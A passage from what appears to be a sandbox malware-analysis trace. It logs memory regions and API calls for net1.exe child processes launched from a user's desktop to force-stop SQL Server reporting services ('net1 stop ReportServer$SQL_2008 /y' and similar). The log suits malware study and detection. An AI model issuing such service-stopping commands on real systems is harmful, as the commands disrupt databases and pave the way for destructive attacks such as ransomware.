= "" Region: id = 9311 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9312 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9313 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 716 os_tid = 0xd60 Process: id = "245" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5e2e7000" os_pid = "0xe68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "236" os_parent_pid = "0xe84" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9314 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9315 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9316 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9317 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 9318 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9319 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9320 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9321 start_va = 0xff5c0000 end_va = 0xff5f2fff entry_point = 0xff5c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9322 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9323 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9324 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 9325 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9326 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9327 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9328 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9329 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9330 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9331 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9332 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 9333 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 9334 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9335 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9336 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9337 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9338 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9339 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9340 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9341 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9342 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9343 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9344 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9345 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9346 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9347 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9348 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9349 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9350 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9351 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9405 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 718 os_tid = 0x1390 [0108.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf8f0 | out: lpSystemTimeAsFileTime=0xcf8f0*(dwLowDateTime=0xf5d33c50, dwHighDateTime=0x1d48689)) [0108.506] GetCurrentProcessId () returned 0xe68 [0108.506] GetCurrentThreadId () returned 0x1390 [0108.506] GetTickCount () returned 0x24da2 [0108.506] QueryPerformanceCounter (in: lpPerformanceCount=0xcf8f8 | out: lpPerformanceCount=0xcf8f8*=1815542400000) returned 1 [0108.507] GetModuleHandleW (lpModuleName=0x0) returned 0xff5c0000 [0108.507] __set_app_type (_Type=0x1) [0108.507] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff5d9c9c) returned 0x0 [0108.507] __getmainargs (in: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788, _DoWildCard=0, _StartInfo=0xff5e479c | out: _Argc=0xff5e4780, _Argv=0xff5e4790, _Env=0xff5e4788) returned 0 [0108.507] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.507] GetConsoleOutputCP () returned 0x1b5 [0108.507] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff5ecec0 | out: lpCPInfo=0xff5ecec0) returned 1 [0108.508] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0108.509] sprintf_s (in: _DstBuf=0xcf898, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0108.509] setlocale (category=0, locale=".437") returned="English_United States.437" [0108.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.511] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.511] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0108.511] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf630, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0108.511] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0108.511] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf888 | out: Buffer=0xcf888*=0x184d60) returned 0x0 [0108.511] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf888 | out: Buffer=0xcf888*=0x18c130) returned 0x0 [0108.511] _fileno (_File=0x7fefdba2a80) returned 0 [0108.511] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0108.512] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0108.512] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0108.512] _wcsicmp (_String1="config", _String2="stop") returned -16 [0108.512] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0108.512] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0108.512] _wcsicmp (_String1="file", _String2="stop") returned -13 [0108.512] _wcsicmp (_String1="files", _String2="stop") returned -13 [0108.512] _wcsicmp (_String1="group", _String2="stop") returned -12 [0108.512] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0108.512] _wcsicmp (_String1="help", _String2="stop") returned -11 [0108.512] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0108.512] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0108.512] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0108.512] _wcsicmp (_String1="session", _String2="stop") returned -15 [0108.512] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0108.512] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0108.512] _wcsicmp (_String1="share", _String2="stop") returned -12 [0108.512] _wcsicmp (_String1="start", _String2="stop") returned -14 [0108.512] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0108.512] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0108.512] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0108.512] _wcsicmp (_String1="accounts", _String2="ReportServer$SQL_2008") returned -17 [0108.571] _wcsicmp (_String1="computer", _String2="ReportServer$SQL_2008") returned -15 [0108.571] _wcsicmp (_String1="config", _String2="ReportServer$SQL_2008") returned -15 [0108.571] _wcsicmp (_String1="continue", _String2="ReportServer$SQL_2008") returned -15 [0108.571] _wcsicmp (_String1="cont", _String2="ReportServer$SQL_2008") returned -15 [0108.571] _wcsicmp (_String1="file", _String2="ReportServer$SQL_2008") returned -12 [0108.571] _wcsicmp (_String1="files", _String2="ReportServer$SQL_2008") returned -12 [0108.571] _wcsicmp (_String1="group", _String2="ReportServer$SQL_2008") returned -11 [0108.571] _wcsicmp (_String1="groups", _String2="ReportServer$SQL_2008") returned -11 [0108.571] _wcsicmp (_String1="help", _String2="ReportServer$SQL_2008") returned -10 [0108.572] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SQL_2008") returned -10 [0108.572] _wcsicmp (_String1="localgroup", _String2="ReportServer$SQL_2008") returned -6 [0108.572] _wcsicmp (_String1="pause", _String2="ReportServer$SQL_2008") returned -2 [0108.572] _wcsicmp (_String1="session", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="sessions", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="sess", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="share", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="start", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="stats", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="statistics", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="stop", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="time", _String2="ReportServer$SQL_2008") returned 2 [0108.572] _wcsicmp (_String1="user", _String2="ReportServer$SQL_2008") returned 3 [0108.572] _wcsicmp (_String1="users", _String2="ReportServer$SQL_2008") returned 3 [0108.572] _wcsicmp (_String1="msg", _String2="ReportServer$SQL_2008") returned -5 [0108.572] _wcsicmp (_String1="messenger", _String2="ReportServer$SQL_2008") returned -5 [0108.572] _wcsicmp (_String1="receiver", _String2="ReportServer$SQL_2008") returned -13 [0108.572] _wcsicmp (_String1="rcv", _String2="ReportServer$SQL_2008") returned -2 [0108.572] _wcsicmp (_String1="netpopup", _String2="ReportServer$SQL_2008") returned -4 [0108.572] _wcsicmp (_String1="redirector", _String2="ReportServer$SQL_2008") returned -12 [0108.572] _wcsicmp (_String1="redir", _String2="ReportServer$SQL_2008") returned -12 [0108.572] _wcsicmp (_String1="rdr", _String2="ReportServer$SQL_2008") returned -1 [0108.572] _wcsicmp (_String1="workstation", _String2="ReportServer$SQL_2008") returned 5 [0108.572] _wcsicmp (_String1="work", _String2="ReportServer$SQL_2008") returned 5 [0108.572] _wcsicmp (_String1="wksta", _String2="ReportServer$SQL_2008") returned 5 [0108.572] _wcsicmp (_String1="prdr", _String2="ReportServer$SQL_2008") returned -2 [0108.572] _wcsicmp (_String1="devrdr", _String2="ReportServer$SQL_2008") returned -14 [0108.572] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SQL_2008") returned -6 [0108.572] _wcsicmp (_String1="server", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="svr", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="srv", _String2="ReportServer$SQL_2008") returned 1 [0108.572] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SQL_2008") returned -6 [0108.572] _wcsicmp (_String1="alerter", _String2="ReportServer$SQL_2008") returned -17 [0108.573] _wcsicmp (_String1="netlogon", _String2="ReportServer$SQL_2008") returned -4 [0108.573] _wcsupr (in: _String="ReportServer$SQL_2008" | out: _String="REPORTSERVER$SQL_2008") returned="REPORTSERVER$SQL_2008" [0108.573] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x18ce40 [0108.577] GetServiceKeyNameW (in: hSCManager=0x18ce40, lpDisplayName="REPORTSERVER$SQL_2008", lpServiceName=0xff5e5750, lpcchBuffer=0xcf7a8 | out: lpServiceName="", lpcchBuffer=0xcf7a8) returned 0 [0108.577] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SQL_2008") returned -5 [0108.578] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SQL_2008") returned -5 [0108.578] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SQL_2008") returned -13 [0108.578] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SQL_2008") returned -2 [0108.578] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SQL_2008") returned -12 [0108.578] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SQL_2008") returned -12 [0108.578] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SQL_2008") returned -1 [0108.578] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SQL_2008") returned 5 [0108.578] _wcsicmp (_String1="work", _String2="REPORTSERVER$SQL_2008") returned 5 [0108.578] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SQL_2008") returned 5 [0108.578] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SQL_2008") returned -2 [0108.578] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SQL_2008") returned -14 [0108.578] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SQL_2008") returned -6 [0108.578] _wcsicmp (_String1="server", _String2="REPORTSERVER$SQL_2008") returned 1 [0108.578] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SQL_2008") returned 1 [0108.578] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SQL_2008") returned 1 [0108.578] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SQL_2008") returned -6 [0108.578] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SQL_2008") returned -17 [0108.578] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SQL_2008") returned -4 [0108.578] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0xcf7b0 | out: bufptr=0xcf7b0) returned 0x889 [0108.579] wcscpy_s (in: _Destination=0xff5e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0108.579] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0108.579] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0108.581] GetFileType (hFile=0xb) returned 0x2 [0108.581] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf678 | out: lpMode=0xcf678) returned 1 [0108.581] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf670, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0xcf670*=0x1e) returned 1 [0108.581] GetFileType (hFile=0xb) returned 0x2 [0108.581] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf678 | out: lpMode=0xcf678) returned 1 [0108.582] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf670, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0xcf670*=0x2) returned 1 [0108.582] _ultow (in: _Dest=0x889, _Radix=849632 | out: _Dest=0x889) returned="2185" [0108.582] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff5e5b50, nSize=0x800, Arguments=0xff5e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0108.582] GetFileType (hFile=0xb) returned 0x2 [0108.582] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf678 | out: lpMode=0xcf678) returned 1 [0108.582] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf670, lpReserved=0x0 | out: lpBuffer=0xff5e5b50*, lpNumberOfCharsWritten=0xcf670*=0x34) returned 1 [0108.582] GetFileType (hFile=0xb) returned 0x2 [0108.583] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf678 | out: lpMode=0xcf678) returned 1 [0108.583] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff5c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf670, lpReserved=0x0 | out: lpBuffer=0xff5c1efc*, lpNumberOfCharsWritten=0xcf670*=0x2) returned 1 [0108.583] NetApiBufferFree (Buffer=0x184d60) returned 0x0 [0108.583] NetApiBufferFree (Buffer=0x18c130) returned 0x0 [0108.583] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SQL_2008 /y" [0108.583] exit (_Code=2) Process: id = "246" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5224e000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "237" os_parent_pid = "0xd20" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9352 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9353 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9354 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9355 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9356 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9357 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9358 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9359 start_va = 0xff5c0000 end_va = 0xff5f2fff entry_point = 0xff5c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9360 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9361 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9362 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 9363 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9364 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 9365 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9366 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9367 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9368 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9369 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9370 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 9371 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 9372 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9373 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9374 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9375 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9376 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9377 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9378 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9379 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9380 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9381 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9382 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9383 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9384 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 